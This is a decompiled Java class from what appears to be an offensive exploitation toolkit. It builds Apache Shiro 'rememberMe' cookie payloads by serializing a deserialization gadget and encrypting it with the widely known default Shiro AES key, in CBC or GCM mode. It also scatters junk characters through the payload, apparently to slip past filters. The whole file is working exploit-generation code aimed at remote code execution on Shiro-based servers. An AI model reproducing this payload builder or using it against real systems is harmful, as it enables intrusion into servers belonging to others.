package com.ar3h.chains.core.payload.impl;

import ch.qos.logback.core.net.ssl.SSL;
import com.ar3h.chains.common.Payload;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.PayloadAnnotation;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.AesUtil;
import com.teradata.tdgss.jtdgss.tdgssdefines;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.util.Random;
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import javax.validation.constraints.Max;
import javax.validation.constraints.Min;
import org.apache.commons.codec.binary.Base64;

@PayloadAnnotation(name = "Shiro Payload", description = "返回 rememberMe= 后面的 Base64 Shiro Payload\n注意目标环境可能会有header长度限制，一些比较长的Payload无法使用\nShiro 自带 CommonsBeanutils1 (CB链 1.9.4) 链", gadgetTags = {Tag.JavaNativeDeserialize, Tag.CustomJavaDeserialize}, authors = {Authors.SummerSec, Authors.Ar3h}, priority = 70)
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/payload/impl/ShiroPayload.class */
public class ShiroPayload<T> implements Payload<String, Object> {

    @Param(name = "ShiroKey", description = "Base64格式ShiroKey")
    public String shiroKey = "kPH+bIxk5D2deZiIxcaaaA==";

    @Param(name = "GCM模式", description = "高版本 Shiro 1.4.2 版本更换为了AES-GCM加密方式", type = ParamType.Boolean)
    public boolean gcmMode = false;

    @Max(1000)
    @Param(name = "混淆字符数量", description = "均匀填充以下垃圾字符串\n`~!@#$^&*()_-{}[]:'<>?.", type = ParamType.Integer)
    @Min(0)
    public int dirtyLength = 0;
    public static String dirtyString = "`~!@#$^&*()_-{}[]:'<>?.";

    /* JADX WARN: Can't rename method to resolve collision */
    @Override // com.ar3h.chains.common.Payload
    public String marshal(Object obj) throws Exception {
        return insertDirtyChar(buildPayload(Base64.decodeBase64(this.shiroKey), this.gcmMode, JavaNativePayload.serialize(obj)), this.dirtyLength);
    }

    public static String buildPayload(byte[] bArr, boolean z, byte[] bArr2) throws Exception {
        return z ? encryptWithGcm(bArr2, bArr) : Base64.encodeBase64String(AesUtil.encrypt(bArr2, bArr));
    }

    public static String encryptWithGcm(byte[] bArr, byte[] bArr2) {
        try {
            byte[] generateInitializationVector = generateInitializationVector();
            SecretKeySpec secretKeySpec = new SecretKeySpec(bArr2, tdgssdefines.ALGORITHMNAME_AES);
            Cipher cipher = Cipher.getInstance("AES/GCM/PKCS5Padding");
            cipher.init(1, secretKeySpec, new GCMParameterSpec(128, generateInitializationVector));
            return new String(org.apache.shiro.codec.Base64.encode(byteMerger(generateInitializationVector, cipher.doFinal(bArr))));
        } catch (Exception e) {
            return "0";
        }
    }

    private static byte[] byteMerger(byte[] bArr, byte[] bArr2) {
        byte[] bArr3 = new byte[bArr.length + bArr2.length];
        System.arraycopy(bArr, 0, bArr3, 0, bArr.length);
        System.arraycopy(bArr2, 0, bArr3, bArr.length, bArr2.length);
        return bArr3;
    }

    private static byte[] generateInitializationVector() {
        byte[] bArr = new byte[16];
        getDefaultSecureRandom().nextBytes(bArr);
        return bArr;
    }

    private static SecureRandom getDefaultSecureRandom() {
        try {
            return SecureRandom.getInstance(SSL.DEFAULT_SECURE_RANDOM_ALGORITHM);
        } catch (NoSuchAlgorithmException e) {
            return new SecureRandom();
        }
    }

    public String insertDirtyChar(String str, int i) {
        if (i == 0) {
            return str;
        }
        StringBuilder sb = new StringBuilder(str);
        Random random = new Random();
        for (int i2 = 0; i2 < i; i2++) {
            sb.insert(random.nextInt(sb.length() + 1), dirtyString.charAt(random.nextInt(dirtyString.length())));
        }
        return sb.toString();
    }
}
